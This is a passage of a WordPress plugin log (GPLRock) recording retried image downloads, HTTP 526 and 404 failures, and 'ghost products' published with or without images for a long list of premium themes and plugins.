Code: 526, Error: [05-Apr-2026 00:52:00 UTC] GPLRock WARNING: Image download failed for product auros-furniture-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/auros---furniture-elementor-woocommerce-theme-10913.webp [05-Apr-2026 00:52:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: auros-furniture-elementor-woocommerce-theme [05-Apr-2026 00:52:00 UTC] GPLRock: Image download failed for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:02 UTC] GPLRock: Image download failed for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iustore---fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme-33403.webp for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:52:04 UTC] GPLRock: Image download failed for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:06 UTC] GPLRock: Image download failed for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iustore---fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme-33403.webp for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:52:08 UTC] GPLRock WARNING: Image download failed for product iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/iustore---fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme-33403.webp [05-Apr-2026 00:52:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: iustore-fashion-beauty-cosmetic-shop-woocommerce-wordpress-theme [05-Apr-2026 00:52:09 UTC] GPLRock: Image download failed for product fixy-a-simple-sexy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:11 UTC] GPLRock: Image download failed for product fixy-a-simple-sexy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fixy-a-simple--sexy-wordpress-theme-29036.webp for product fixy-a-simple-sexy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:52:13 UTC] GPLRock: Image download failed for product fixy-a-simple-sexy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:15 UTC] GPLRock: Image download failed for product fixy-a-simple-sexy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fixy-a-simple--sexy-wordpress-theme-29036.webp for product fixy-a-simple-sexy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:52:17 UTC] GPLRock WARNING: Image download failed for product fixy-a-simple-sexy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fixy-a-simple--sexy-wordpress-theme-29036.webp [05-Apr-2026 00:52:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fixy-a-simple-sexy-wordpress-theme [05-Apr-2026 00:53:02 UTC] GPLRock: Image downloaded successfully for product flatsome-multi-purpose-responsive-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-baa0361c.jpg [05-Apr-2026 00:53:02 UTC] GPLRock: Using pre-downloaded image for product flatsome-multi-purpose-responsive-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-baa0361c.jpg [05-Apr-2026 00:53:02 UTC] GPLRock: Ghost product published with image - Product ID: flatsome-multi-purpose-responsive-woocommerce-theme [05-Apr-2026 00:53:04 UTC] GPLRock: Image downloaded successfully for product wpforms-drag-drop-wordpress-form-builder-gpl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f526d20.jpg [05-Apr-2026 00:53:04 UTC] GPLRock: Using pre-downloaded image for product wpforms-drag-drop-wordpress-form-builder-gpl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f526d20.jpg [05-Apr-2026 00:53:04 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-drag-drop-wordpress-form-builder-gpl [05-Apr-2026 00:53:07 UTC] GPLRock: Image download failed for product tutor-lms-pro (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:11 UTC] GPLRock: Image download failed for product tutor-lms-pro (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:15 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Tutor-LMS-Pro.jpg for product tutor-lms-pro after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:53:17 UTC] GPLRock: Image download failed for product tutor-lms-pro (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:21 UTC] GPLRock: Image download failed for product tutor-lms-pro (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:25 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Tutor-LMS-Pro.jpg for product tutor-lms-pro after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:53:25 UTC] GPLRock WARNING: Image download failed for product tutor-lms-pro. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Tutor-LMS-Pro.jpg [05-Apr-2026 00:53:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tutor-lms-pro [05-Apr-2026 00:53:26 UTC] GPLRock: Image downloaded successfully for product xstore-responsive-multi-purpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-426902d8.avif [05-Apr-2026 00:53:26 UTC] GPLRock: Using pre-downloaded image for product xstore-responsive-multi-purpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-426902d8.avif [05-Apr-2026 00:53:26 UTC] GPLRock: Ghost product published with image - Product ID: xstore-responsive-multi-purpose-woocommerce-theme [05-Apr-2026 00:53:29 UTC] GPLRock: Image download failed for product travel-booking-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:33 UTC] GPLRock: Image download failed for product travel-booking-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:37 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Travel-Booking-WordPress-Theme.jpg for product travel-booking-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:53:39 UTC] GPLRock: Image download failed for product travel-booking-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:44 UTC] GPLRock: Image download failed for product travel-booking-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:53:48 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Travel-Booking-WordPress-Theme.jpg for product travel-booking-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:53:48 UTC] GPLRock WARNING: Image download failed for product travel-booking-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Travel-Booking-WordPress-Theme.jpg [05-Apr-2026 00:53:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travel-booking-wordpress-theme [05-Apr-2026 00:53:50 UTC] GPLRock: Image downloaded successfully for product service-finder-provider-and-business-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aca957bf.jpg [05-Apr-2026 00:53:50 UTC] GPLRock: Using pre-downloaded image for product service-finder-provider-and-business-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aca957bf.jpg [05-Apr-2026 00:53:50 UTC] GPLRock: Ghost product published with image - Product ID: service-finder-provider-and-business-listing-wordpress-theme [05-Apr-2026 00:53:52 UTC] GPLRock: Image downloaded successfully for product ewebot-marketing-seo-digital-agency (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eab1f9b9.jpg [05-Apr-2026 00:53:52 UTC] GPLRock: Using pre-downloaded image for product ewebot-marketing-seo-digital-agency: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eab1f9b9.jpg [05-Apr-2026 00:53:52 UTC] GPLRock: Ghost product published with image - Product ID: ewebot-marketing-seo-digital-agency [05-Apr-2026 00:53:54 UTC] GPLRock: Image downloaded successfully for product wordpress-auto-spinner-articles-rewriter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f34e8d4.jpg [05-Apr-2026 00:53:55 UTC] GPLRock: Using pre-downloaded image for product wordpress-auto-spinner-articles-rewriter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f34e8d4.jpg [05-Apr-2026 00:53:55 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-auto-spinner-articles-rewriter [05-Apr-2026 00:53:58 UTC] GPLRock: Image download failed for product astra-pro-addon (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:54:02 UTC] GPLRock: Image download failed for product astra-pro-addon (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:54:06 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Astra-Pro-Addon.jpg for product astra-pro-addon after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:54:08 UTC] GPLRock: Image download failed for product astra-pro-addon (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:54:12 UTC] GPLRock: Image download failed for product astra-pro-addon (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:54:16 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Astra-Pro-Addon.jpg for product astra-pro-addon after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:54:16 UTC] GPLRock WARNING: Image download failed for product astra-pro-addon. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Astra-Pro-Addon.jpg [05-Apr-2026 00:54:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: astra-pro-addon [05-Apr-2026 00:54:18 UTC] GPLRock: Image downloaded successfully for product eduma-education-wordpress-theme-education-wp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac7e7eb3.avif [05-Apr-2026 00:54:18 UTC] GPLRock: Using pre-downloaded image for product eduma-education-wordpress-theme-education-wp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac7e7eb3.avif [05-Apr-2026 00:54:18 UTC] GPLRock: Ghost product published with image - Product ID: eduma-education-wordpress-theme-education-wp [05-Apr-2026 00:55:00 UTC] GPLRock: Image downloaded successfully for product chaos-responsive-bag-shop-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eaabfdfe.jpg [05-Apr-2026 00:55:00 UTC] GPLRock: Using pre-downloaded image for product chaos-responsive-bag-shop-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eaabfdfe.jpg [05-Apr-2026 00:55:00 UTC] GPLRock: Ghost product published with image - Product ID: chaos-responsive-bag-shop-theme [05-Apr-2026 00:55:02 UTC] GPLRock: Image downloaded successfully for product zarja-feminine-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7de4ec46.jpg [05-Apr-2026 00:55:02 UTC] GPLRock: Using pre-downloaded image for product zarja-feminine-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7de4ec46.jpg [05-Apr-2026 00:55:02 UTC] GPLRock: Ghost product published with image - Product ID: zarja-feminine-wordpress-blog-theme [05-Apr-2026 00:55:04 UTC] GPLRock: Image downloaded successfully for product startup-company-business-technology-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-18804aff.jpg [05-Apr-2026 00:55:04 UTC] GPLRock: Using pre-downloaded image for product startup-company-business-technology-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-18804aff.jpg [05-Apr-2026 00:55:04 UTC] GPLRock: Ghost product published with image - Product ID: startup-company-business-technology-wp-theme [05-Apr-2026 00:55:06 UTC] GPLRock: Image downloaded successfully for product pro-news-ticker-marquee-for-wpbakery-page-bilder-display-post-custom-post-rss-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-710c4b52.jpg [05-Apr-2026 00:55:06 UTC] GPLRock: Using pre-downloaded image for product pro-news-ticker-marquee-for-wpbakery-page-bilder-display-post-custom-post-rss-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-710c4b52.jpg [05-Apr-2026 00:55:06 UTC] GPLRock: Ghost product published with image - Product ID: pro-news-ticker-marquee-for-wpbakery-page-bilder-display-post-custom-post-rss-woocommerce [05-Apr-2026 00:55:07 UTC] GPLRock: Image downloaded successfully for product crypto-land-crypto-currency-landing-page-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0cd759c9.jpg [05-Apr-2026 00:55:07 UTC] GPLRock: Using pre-downloaded image for product crypto-land-crypto-currency-landing-page-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0cd759c9.jpg [05-Apr-2026 00:55:07 UTC] GPLRock: Ghost product published with image - Product ID: crypto-land-crypto-currency-landing-page-wordpress-theme [05-Apr-2026 00:55:09 UTC] GPLRock: Image downloaded successfully for product editor-blog-a-wordpress-blog-theme-for-bloggers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-837dd667.jpg [05-Apr-2026 00:55:09 UTC] GPLRock: Using pre-downloaded image for product editor-blog-a-wordpress-blog-theme-for-bloggers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-837dd667.jpg [05-Apr-2026 00:55:09 UTC] GPLRock: Ghost product published with image - Product ID: editor-blog-a-wordpress-blog-theme-for-bloggers [05-Apr-2026 00:55:11 UTC] GPLRock: Image downloaded successfully for product roof-construction-building-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3dd31605.jpg [05-Apr-2026 00:55:11 UTC] GPLRock: Using pre-downloaded image for product roof-construction-building-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3dd31605.jpg [05-Apr-2026 00:55:11 UTC] GPLRock: Ghost product published with image - Product ID: roof-construction-building-wordpress-theme [05-Apr-2026 00:55:13 UTC] GPLRock: Image downloaded successfully for product woocommerce-paypal-digital-goods-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-547df06b.png [05-Apr-2026 00:55:13 UTC] GPLRock: Using pre-downloaded image for product woocommerce-paypal-digital-goods-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-547df06b.png [05-Apr-2026 00:55:13 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-paypal-digital-goods-gateway [05-Apr-2026 00:55:14 UTC] GPLRock: Image downloaded successfully for product elegant-tabs-for-fusion-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9da6f88.jpg [05-Apr-2026 00:55:14 UTC] GPLRock: Using pre-downloaded image for product elegant-tabs-for-fusion-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9da6f88.jpg [05-Apr-2026 00:55:14 UTC] GPLRock: Ghost product published with image - Product ID: elegant-tabs-for-fusion-builder [05-Apr-2026 00:55:16 UTC] GPLRock: Image downloaded successfully for product 360-panoramic-image-viewer-responsive-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5fb3fa6.jpg [05-Apr-2026 00:55:16 UTC] GPLRock: Using pre-downloaded image for product 360-panoramic-image-viewer-responsive-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5fb3fa6.jpg [05-Apr-2026 00:55:16 UTC] GPLRock: Ghost product published with image - Product ID: 360-panoramic-image-viewer-responsive-wordpress-plugin [05-Apr-2026 00:56:59 UTC] GPLRock: Image download failed for product hayden-kids-store-baby-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:01 UTC] GPLRock: Image download failed for product hayden-kids-store-baby-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hayden---kids-store--baby-shop-19481.webp for product hayden-kids-store-baby-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:03 UTC] GPLRock: Image download failed for product hayden-kids-store-baby-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:05 UTC] GPLRock: Image download failed for product hayden-kids-store-baby-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hayden---kids-store--baby-shop-19481.webp for product hayden-kids-store-baby-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:07 UTC] GPLRock WARNING: Image download failed for product hayden-kids-store-baby-shop. URL: https://meldwp.com/wp-content/uploads/hayden---kids-store--baby-shop-19481.webp [05-Apr-2026 00:57:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hayden-kids-store-baby-shop [05-Apr-2026 00:57:08 UTC] GPLRock: Image download failed for product tmexco-digital-marketplace-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:10 UTC] GPLRock: Image download failed for product tmexco-digital-marketplace-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tmexco---digital-marketplace-woocommerce-theme-22477.webp for product tmexco-digital-marketplace-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:12 UTC] GPLRock: Image download failed for product tmexco-digital-marketplace-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:14 UTC] GPLRock: Image download failed for product tmexco-digital-marketplace-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tmexco---digital-marketplace-woocommerce-theme-22477.webp for product tmexco-digital-marketplace-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:16 UTC] GPLRock WARNING: Image download failed for product tmexco-digital-marketplace-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/tmexco---digital-marketplace-woocommerce-theme-22477.webp [05-Apr-2026 00:57:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tmexco-digital-marketplace-woocommerce-theme [05-Apr-2026 00:57:16 UTC] GPLRock: Image download failed for product healthhub-health-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:18 UTC] GPLRock: Image download failed for product healthhub-health-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healthhub---health--medical-doctor-wordpress-theme-26684.webp for product healthhub-health-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:21 UTC] GPLRock: Image download failed for product healthhub-health-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:23 UTC] GPLRock: Image download failed for product healthhub-health-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healthhub---health--medical-doctor-wordpress-theme-26684.webp for product healthhub-health-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:25 UTC] GPLRock WARNING: Image download failed for product healthhub-health-medical-doctor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/healthhub---health--medical-doctor-wordpress-theme-26684.webp [05-Apr-2026 00:57:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: healthhub-health-medical-doctor-wordpress-theme [05-Apr-2026 00:57:25 UTC] GPLRock: Image downloaded successfully for product skyhaus-single-property-one-page-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8e5b63c.webp [05-Apr-2026 00:57:25 UTC] GPLRock: Using pre-downloaded image for product skyhaus-single-property-one-page-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8e5b63c.webp [05-Apr-2026 00:57:25 UTC] GPLRock: Ghost product published with image - Product ID: skyhaus-single-property-one-page-theme [05-Apr-2026 00:57:25 UTC] GPLRock: Image downloaded successfully for product itsoluz-it-solutions-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dacb3929.webp [05-Apr-2026 00:57:25 UTC] GPLRock: Using pre-downloaded image for product itsoluz-it-solutions-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dacb3929.webp [05-Apr-2026 00:57:25 UTC] GPLRock: Ghost product published with image - Product ID: itsoluz-it-solutions-wordpress-theme [05-Apr-2026 00:57:25 UTC] GPLRock: Image download failed for product increate-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:27 UTC] GPLRock: Image download failed for product increate-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/increate---responsive-multipurpose-wordpress-theme-10129.webp for product increate-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:29 UTC] GPLRock: Image download failed for product increate-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:32 UTC] GPLRock: Image download failed for product increate-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/increate---responsive-multipurpose-wordpress-theme-10129.webp for product increate-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:34 UTC] GPLRock WARNING: Image download failed for product increate-responsive-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/increate---responsive-multipurpose-wordpress-theme-10129.webp [05-Apr-2026 00:57:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: increate-responsive-multipurpose-wordpress-theme [05-Apr-2026 00:57:34 UTC] GPLRock: Image download failed for product aforapple-kids-education-lms-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:36 UTC] GPLRock: Image download failed for product aforapple-kids-education-lms-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aforapple---kids-education--lms-wordpress-theme-30353.webp for product aforapple-kids-education-lms-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:38 UTC] GPLRock: Image download failed for product aforapple-kids-education-lms-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:40 UTC] GPLRock: Image download failed for product aforapple-kids-education-lms-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aforapple---kids-education--lms-wordpress-theme-30353.webp for product aforapple-kids-education-lms-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:42 UTC] GPLRock WARNING: Image download failed for product aforapple-kids-education-lms-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aforapple---kids-education--lms-wordpress-theme-30353.webp [05-Apr-2026 00:57:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aforapple-kids-education-lms-wordpress-theme [05-Apr-2026 00:57:43 UTC] GPLRock: Image download failed for product cristiano-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:45 UTC] GPLRock: Image download failed for product cristiano-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cristiano---restaurant-wordpress-theme-8184.webp for product cristiano-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:47 UTC] GPLRock: Image download failed for product cristiano-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:49 UTC] GPLRock: Image download failed for product cristiano-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cristiano---restaurant-wordpress-theme-8184.webp for product cristiano-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:51 UTC] GPLRock WARNING: Image download failed for product cristiano-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cristiano---restaurant-wordpress-theme-8184.webp [05-Apr-2026 00:57:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cristiano-restaurant-wordpress-theme [05-Apr-2026 00:57:51 UTC] GPLRock: Image downloaded successfully for product hryzantema-human-resources-recruiting-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0d52b4f7.webp [05-Apr-2026 00:57:51 UTC] GPLRock: Using pre-downloaded image for product hryzantema-human-resources-recruiting-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0d52b4f7.webp [05-Apr-2026 00:57:51 UTC] GPLRock: Ghost product published with image - Product ID: hryzantema-human-resources-recruiting-wordpress [05-Apr-2026 00:57:51 UTC] GPLRock: Image download failed for product liquory-drinks-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:53 UTC] GPLRock: Image download failed for product liquory-drinks-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liquory---drinks-shop-woocommerce-theme-16103.webp for product liquory-drinks-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:57:56 UTC] GPLRock: Image download failed for product liquory-drinks-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:57:58 UTC] GPLRock: Image download failed for product liquory-drinks-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:58:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liquory---drinks-shop-woocommerce-theme-16103.webp for product liquory-drinks-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:58:00 UTC] GPLRock WARNING: Image download failed for product liquory-drinks-shop-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/liquory---drinks-shop-woocommerce-theme-16103.webp [05-Apr-2026 00:58:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: liquory-drinks-shop-woocommerce-theme [05-Apr-2026 00:58:59 UTC] GPLRock: Image download failed for product dentamedi-dentist-dental-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:01 UTC] GPLRock: Image download failed for product dentamedi-dentist-dental-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:59:03 